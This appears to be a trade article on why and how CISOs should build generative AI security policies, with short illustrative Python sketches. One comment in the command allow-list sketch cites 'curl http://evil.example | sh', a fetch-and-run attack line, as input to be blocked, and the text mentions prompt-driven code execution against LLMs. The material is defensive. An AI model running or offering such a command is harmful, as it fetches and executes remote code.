If you don’t already have a generative AI security policy, there’s no time to lose

The boom in business adoption of generative AI as a useful tool is raising concerns in the cybersecurity community that adoption of the technology is outpacing the guidelines governing its use, especially given the well-documented security threats and data privacy risks it can introduce.

As business use cases skyrocket, the message for CISOs is clear: if you don’t have a strong AI security policy specifically pertaining to generative AI, you need to create one right away. While rules around the introduction and use of AI have typically been murky in enterprises, generative AI is a new beast: it’s evolving quickly, it is enormously promising, and it comes with some very serious security implications.

The challenge for CISOs is to develop cybersecurity policies that not only embrace and support business adoption of this technology but also effectively address risk without stifling innovation. Any CISO who thinks they can put this off for a year or two to see how generative AI develops, hoping to retrofit a security policy appropriate to generative AI’s pervasiveness later down the line, should carefully consider what happened with shadow IT. Businesses were slow off the mark, from a security policy perspective, in dealing with personal technology when it began being used for corporate activities.

Why you need an AI security policy now

AI adoption, especially the use of generative AI, is growing rapidly, yet organizations have not necessarily assessed the potential security risks. According to a recent Splunk/Foundry survey, 79% of public sector and 83% of private sector organizations have started to use generative AI in production systems. The primary objective is automation, with about half the respondents saying they are using, or are about to use, the technology to increase productivity through automation. Other use cases for AI include innovation and idea generation (30%), improving goods or services (29%), and detecting and assessing cyber risk (26%).

Companies are also adopting externally created large language models (LLMs) at a rapid rate; 69% of public sector companies report that they are using or will soon use LLMs, compared to 57% of private sector companies. This raises concerns over the risks of using LLMs produced by a third party, including questions about the LLMs’ training, usage, and biases. Most of the Splunk/Foundry survey respondents (78%) say they want global ethical principles to guide the regulation of AI and LLMs.

The problem is that organizations are moving ahead with their AI initiatives faster than industry and government can work out what the proper guidelines and regulations for AI and LLMs should be. That’s why organizations should be establishing their own security policies for the use of AI, to help mitigate the most likely risks from their particular use cases.

Heed the lessons learned from shadow IT

Over time, security teams have tried to rein in shadow IT with policies that mitigate the plethora of risks and challenges it has introduced, but many remain due to its scale. Figures from research firm Gartner revealed that 41% of employees acquired, modified, or created technology outside of IT’s visibility in 2022, while a 2023 shadow IT and project management survey from Capterra found that 57% of small and midsized businesses have had high-impact shadow IT efforts occurring outside the purview of their IT departments.

Although generative AI is quite a different thing, it’s taking off far more quickly than shadow IT did. The lesson is that security-focused policies should be put in place in the early stages, as use of a new technology grows, not after it reaches an unmanageable scale. Adding to the pressure are the potential security risks generative AI can introduce into businesses if left unmanaged, risks that are still only partly understood.

Security-focused generative AI policies are needed now

Most organizations have been experimenting with generative AI use in some way over the last few months, but now they really need to consider security policy implications, says NetSkope CISO Neil Thacker. “They’re in that stage where they’re looking to see the true value of the services, but very soon, they’re going to have to start thinking about controlling it.”

A recent Salesforce survey of more than 500 senior IT leaders revealed that although the majority (67%) are prioritizing generative AI for their business within the next 18 months, almost all admit that extra measures must be taken to address security issues while successfully leveraging the technology.

The problem is that most organizations, regardless of size or industry, are experiencing the same challenge around how to control and manage the secure use of generative AI, Thacker says. “Where does generative AI sit within a policy set and policy framework? Is it about access control? Is it around the encryption of data? Is it around elements of threats like malware?”

The sophistication of generative AI’s evolving capabilities and its growing pervasiveness suggests it’ll touch all those and more, but it’s up to CISOs and security teams to get ahead of that, Thacker says. An effective generative AI security policy can be built upon the trusty security triad of people, process, and technology, but generative AI’s uniqueness puts greater emphasis on a continual feedback loop relating to business-wide use cases, potential risks, and policy application, he adds.

Business alignment is the CISO’s biggest challenge and opportunity

Therein lies the CISO’s biggest generative AI security policy challenge and their biggest opportunity: business alignment. It’s a challenge because most organizations will buy, not build, generative AI, and many may not even buy it directly but receive it via bundled integrations. This requires a significant investment of time to understand as many generative AI business use cases as possible, along with the expanding capabilities of generative AI itself, and to mold them into a policy. It’s an opportunity because it means security controls can be baked into adoption from inception, in line with business needs and goals.

The ultimate aim is to create a top-down, business-appropriate security policy that can be understood and adopted across a company, almost autonomously. It can’t be something that sits isolated within security; different business functions should be able to apply it for the secure use of generative AI without being hand-held by security teams.

“It comes down to classical risk management,” says Jon France, CISO at (ISC)2. “Understand what’s important for the business and understand the risks of either developing or using this technology in relationship to what the business does.”

Know your business’ generative AI use cases

Generative AI use cases, and therefore security policy, will differ not only from one business to another but also potentially between departments (another reason why this needs to be well-understood). Organizations that work with particularly sensitive information, or in highly regulated industries, may be tempted to ban the use of AI altogether.

Some companies have already done so: Samsung banned its use after an accidental disclosure of sensitive company information while using generative AI. However, this type of strict, blanket prohibition approach can be problematic, stifling safe, innovative use and creating the types of policy workaround risks that have been so prevalent with shadow IT. A more intricate, use-case risk management approach may be far more beneficial.

“A development team, for example, may be dealing with sensitive proprietary code that should not be uploaded to a generative AI service, while a marketing department could use such services to get the day-to-day work done in a relatively safe way,” says Andy Syrewicze, a security evangelist at Hornetsecurity. Armed with this type of knowledge, CISOs can make more informed decisions regarding policy, balancing use cases with security readiness and risks.
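To make that kind of per-department decision enforceable rather than purely aspirational, some teams express it as policy-as-data that tooling can consult before a prompt ever leaves the organization. The sketch below is a minimal, hypothetical illustration: the department names, classification labels, and function name are invented for the example and are not drawn from any specific product or from the approaches described above.

```python
# Hypothetical policy-as-data sketch: each department is mapped to the data
# classifications it may send to external generative AI services.
# Department names, labels, and the function name are illustrative only.
GENAI_DATA_POLICY = {
    "engineering": {"public"},            # proprietary code stays out of prompts
    "marketing": {"public", "internal"},  # day-to-day content work allowed
    "finance": set(),                     # no external generative AI use for now
}

def may_submit(department: str, data_classification: str) -> bool:
    """Return True if policy allows this department to submit this data class."""
    allowed = GENAI_DATA_POLICY.get(department, set())
    return data_classification in allowed

# Example checks against the policy table
assert may_submit("marketing", "internal")
assert not may_submit("engineering", "confidential")
assert not may_submit("unknown-team", "public")  # unlisted departments default to deny
```

Keeping the mapping in a single reviewable structure makes it easier for security and the business functions to update the policy together as use cases and risk appetite evolve.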

Learn all you can about generative AI’s capabilities

As well as learning about different business use cases, CISOs also need to educate themselves about generative AI’s capabilities, which are still evolving. “That’s going to take some skills, and security practitioners are going to have to learn the basics of what generative AI is and what it isn’t,” France says.

CISOs are already struggling to keep up with the pace of change in existing security capabilities, so getting on top of providing advanced expertise around generative AI will be challenging, says Jason Revill, head of Avanade’s Global Cybersecurity Center of Excellence. “They’re generally a few steps behind the curve, which I think is due to the skill shortage and the pace of regulation, but also that the pace of security has grown exponentially.” CISOs are probably going to need to consider bringing in external, expert help early to get ahead of generative AI, rather than just letting projects roll on, he adds.

Data control is integral to generative AI security policies

“At the very least, businesses should produce internal policies that dictate what type of information is allowed to be used with generative AI tools,” Syrewicze says. The risks associated with sharing sensitive business information with advanced self-learning AI algorithms are well-documented, so appropriate guidelines and controls around what data can go into generative AI systems, and how that data can be used, are certainly key. “There are intellectual property concerns about what you’re putting into a model, and whether that will be used to train so that someone else can use it,” says France.

Strong policy around data encryption, anonymization, and other data security measures can prevent unauthorized access to, use of, or transfer of data, which AI systems often handle in significant quantities, making the technology more secure and the data better protected, says Brian Sathianathan, Iterate.ai co-founder and CTO.

Data classification, data loss prevention, and detection capabilities are emerging areas of insider risk management that become key to controlling generative AI usage, Revill says. “How do you mitigate or protect, test, and sandbox data? It shouldn’t come as a surprise that test and development environments [for example] are often easily targeted, and data can be exported from them because they tend not to have as rigorous controls as production.”
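As a concrete illustration of the kind of pre-submission control described above, the sketch below redacts a few common sensitive patterns from a prompt before it is sent to an external generative AI service and records what it found for DLP reporting. It is a minimal sketch only, assuming the organization wants a last-line check at the prompt boundary; the patterns, function name, and placeholder format are assumptions for the example, and a real deployment would rely on the organization’s own classification rules and DLP tooling.

```python
import re

# Hypothetical, illustrative patterns only: a real deployment would rely on the
# organization's own data classification rules and DLP tooling.
SENSITIVE_PATTERNS = {
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "credit_card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
    "api_key": re.compile(r"\b(?:sk|key|token)[-_][A-Za-z0-9]{16,}\b"),
}

def redact_prompt(prompt: str) -> tuple[str, list[str]]:
    """Redact known sensitive patterns before a prompt leaves the organization.

    Returns the redacted prompt plus the names of the patterns that matched,
    which can be logged for policy review and DLP reporting.
    """
    findings = []
    for name, pattern in SENSITIVE_PATTERNS.items():
        if pattern.search(prompt):
            findings.append(name)
            prompt = pattern.sub(f"[REDACTED:{name}]", prompt)
    return prompt, findings

safe_prompt, hits = redact_prompt(
    "Summarize the email from jane.doe@example.com sent with key sk-ABCDEF1234567890XYZ"
)
print(safe_prompt)  # sensitive values replaced with placeholders
print(hits)         # ['email', 'api_key']
```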

Generative AI-produced content must be checked for accuracy

Along with controls around what data goes into generative AI, security policies should also cover the content that generative AI produces. A chief concern here relates to “hallucinations,” whereby the LLMs behind generative AI chatbots such as ChatGPT produce output that appears credible but is wrong. This becomes a significant risk if output data is over-relied upon for key decision-making without further analysis of its accuracy, particularly in relation to business-critical matters.

For example, if a company relies on an LLM to generate security reports and analysis, and the LLM produces a report containing incorrect data that the company uses to make critical security decisions, there could be significant repercussions from that reliance on inaccurate LLM-generated content. Any generative AI security policy worth its salt should include clear processes for manually reviewing and rationalizing the accuracy of generated content, never taking it as gospel, Thacker says.
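One way to operationalize that manual-review requirement is to gate generated content behind an explicit approval step, so nothing feeds downstream decisions until a named human has signed off. The sketch below is a hypothetical illustration of that idea; the class, field, and function names are invented for the example and do not describe any specific product or Thacker’s process.

```python
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Optional

# Minimal sketch of a manual-review gate; names are illustrative only.

@dataclass
class GeneratedReport:
    content: str
    source_model: str
    status: str = "pending_review"  # generated content is never trusted by default
    reviewer: Optional[str] = None
    reviewed_at: Optional[datetime] = None

def approve(report: GeneratedReport, reviewer: str) -> GeneratedReport:
    """Record that a named human has checked the generated content for accuracy."""
    report.status = "approved"
    report.reviewer = reviewer
    report.reviewed_at = datetime.now(timezone.utc)
    return report

def release(report: GeneratedReport) -> str:
    """Only approved content may feed downstream security decisions."""
    if report.status != "approved":
        raise PermissionError("Generated content has not passed manual review")
    return report.content

# Usage: a report drafted by an LLM must be approved before it is released
draft = GeneratedReport(content="Quarterly risk summary...", source_model="example-llm")
approve(draft, reviewer="analyst@example.com")
print(release(draft))
```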

Unauthorized code execution should also be considered here, which occurs when an attacker exploits an LLM to execute malicious code, commands, or actions on the underlying system through natural language prompts.
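A common mitigation, sketched below, is to treat model output as untrusted input: tokenize it, check it against an explicit allow-list of permitted commands, and never pass it to a shell or an eval call. The allow-list and function name here are hypothetical assumptions for the example; the safe set of actions is specific to each environment.

```python
import shlex
import subprocess

# Illustrative allow-list only; the safe set of commands is policy-specific.
ALLOWED_COMMANDS = {"whois", "nslookup", "ping"}

def run_model_suggested_command(suggestion: str) -> str:
    """Run an LLM-suggested command only if it appears on the allow-list.

    Model output is treated as untrusted input: it is tokenized, checked
    against an explicit allow-list, and never handed to a shell.
    """
    parts = shlex.split(suggestion)
    if not parts or parts[0] not in ALLOWED_COMMANDS:
        raise PermissionError(f"Command {parts[:1]} is not permitted by policy")
    result = subprocess.run(parts, capture_output=True, text=True, timeout=30, check=False)
    return result.stdout
```

Because the tokens are executed without a shell, metacharacters such as pipes or semicolons in a prompt-injected suggestion are treated as literal arguments rather than shell syntax, and anything whose first token falls outside the allow-list is rejected outright (for example, "curl http://evil.example | sh" raises a PermissionError).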

Include generative AI-enhanced attacks within your security policy

Generative AI-enhanced attacks should also come into the purview of security policies, particularly with regard to how a business responds to them, says Carl Froggett, CIO of Deep Instinct and former head of global infrastructure defense and CISO at Citi. For example, how organizations approach impersonation and social engineering is going to need a rethink because generative AI can make fake content indistinguishable from reality, he adds. “This is more worrying for me from a CISO perspective — the use of generative AI against your company.”

Froggett cites a hypothetical scenario in which generative AI is used by malicious actors to create a realistic audio recording of himself, complete with his unique expressions and slang, that is then used to trick an employee. Such a scenario makes traditional social engineering controls, such as detecting spelling mistakes or malicious links in emails, redundant, he says. Employees will believe they’ve actually spoken to you, have heard your voice, and feel that it’s genuine, Froggett adds. From both a technical and an awareness standpoint, security policy needs to be updated in line with the enhanced social engineering threats that generative AI introduces.

Communication and training key to generative AI security policy success

For any security policy to be successful, it needs to be well-communicated and accessible. “This is a technology challenge, but it’s also about how we communicate it,” Thacker says. The communication of security policy is something that needs to be improved, as does stakeholder management, and CISOs must adapt how security policy is presented from a business perspective, particularly in relation to popular new technology innovations, he adds.

This also encompasses new policies for training staff on the novel business risks that generative AI exposes. “Teach employees how to use generative AI responsibly, articulate some of the risks, but also let them know that the business is approaching this in a verified, responsible way that is going to enable them to be secure,” Revill says.

Supply chain management still important for generative AI control

Generative AI security policies should not omit supply chain and third-party management, applying the same level of due diligence to gauge third parties’ generative AI usage, risk levels, and policies, and to assess whether they pose a threat to the organization. “Supply chain risk hasn’t gone away with generative AI – there are a number of third-party integrations to consider,” Revill says.

Cloud service providers come into the equation too, adds Thacker. “We know that organizations have hundreds, if not thousands, of cloud services, and they are all third-party suppliers. So that same due diligence needs to be performed on most parties, and it’s not just a sign-up when you first log in or use the service, it must be a constant review.”

Extensive supplier questionnaires detailing as much information as possible about any third party’s generative AI usage are the way to go for now, Thacker says. Good questions to include are: What data are you inputting? How is that protected? How are sessions limited? How do you ensure that data is not shared across other organizations and model training? Many companies may not be able to answer such questions right away, especially regarding their usage of generic services, but it’s important to get these conversations started as soon as possible to gain as much insight as possible, Thacker says.

Make your generative AI security policy exciting

A final thing to consider is the benefit of making generative AI security policy as exciting and interactive as possible, says Revill. “I feel like this is such a big turning point that any organization that doesn’t showcase to its employees that they are thinking of ways they can leverage generative AI to boost productivity and make their employees’ lives easier, could find themselves in a sticky situation down the line.”

The next generation of digital natives are going to be using the technology on their own devices anyway, so you might as well teach them to be responsible with it in their work lives so that you’re protecting the business as a whole, he adds. “We want to be the security facilitator in business – to make businesses flow more securely, and not hold innovation back.”